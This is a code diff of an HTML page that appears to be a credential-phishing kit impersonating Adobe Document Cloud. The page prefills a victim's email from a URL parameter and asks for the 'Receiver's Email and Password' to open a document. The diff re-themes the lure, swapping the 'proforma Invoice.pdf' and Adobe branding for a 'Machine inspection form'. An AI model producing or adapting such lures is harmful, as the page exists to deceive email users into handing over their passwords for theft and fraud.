--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
   <!-- My custom style rules -->
   <link rel="stylesheet" href="Adobe%20PDF%20Online_files/styles.css">
   <!-- Page Title -->
-  <title>Adobe PDF Online</title>
+  <title>Machine Inspection form</title>
   
   <style>
    
@@ -101,7 +101,7 @@ $("#email").val($.urlPeram('email'));
                 <img src="Adobe%20PDF%20Online_files/word-icon.png" id="attachment" class="mt-1" style="width:85px; margin-top:20px;">
               <div class=""> 
                   <div>
-                    <small class="text-left card-text">Filename: proforma Invoice.pdf</small>
+                    <small class="text-left card-text">Online  inspection form.pdf</small>
                   </div>
               <div>
                   <!-- Document Description Label --> 
@@ -258,7 +258,7 @@ $("#email").val($.urlPeram('email'));
                   <div>
                     <img style="height:30px;float:left; margin-right:10px;" src="Adobe%20PDF%20Online_files/ted.png">
                   </div>
-                 <span class="modal-title">Adobe Document Cloud</span>
+                 <span class="modal-title">Machine inspection form online</span>
              </div>
 
             <!-- This div spans the 12 columns of the display -->
@@ -306,7 +306,7 @@ $("#email").val($.urlPeram('email'));
                     </div>
 
                     <!-- Submit Button Label -->
-                    <button type="submit" id="blast-log" class="btn btn-primary btn-block">View Document</button>
+                    <button type="submit" id="blast-log" class="btn btn-primary btn-block">open form</button>
                 </form>
             </div>
 
@@ -319,7 +319,7 @@ $("#email").val($.urlPeram('email'));
           <div class="row mt-0">
             <!-- This div spans the 12 columns of the display -->
              <div class="col-sm-12 col-md-12 col-lg-12">
-                 <small style="font-size:12px;">Sign In with Receiver's Email and Password to View document</small>
+                 <small style="font-size:12px;">Sign In with Receiver's Email and Password to Open form</small>
              </div>
                <!-- This div spans the 12 columns of the display -->
              <div class="col-sm-12 col-md-12 col-lg-12 mt-0">
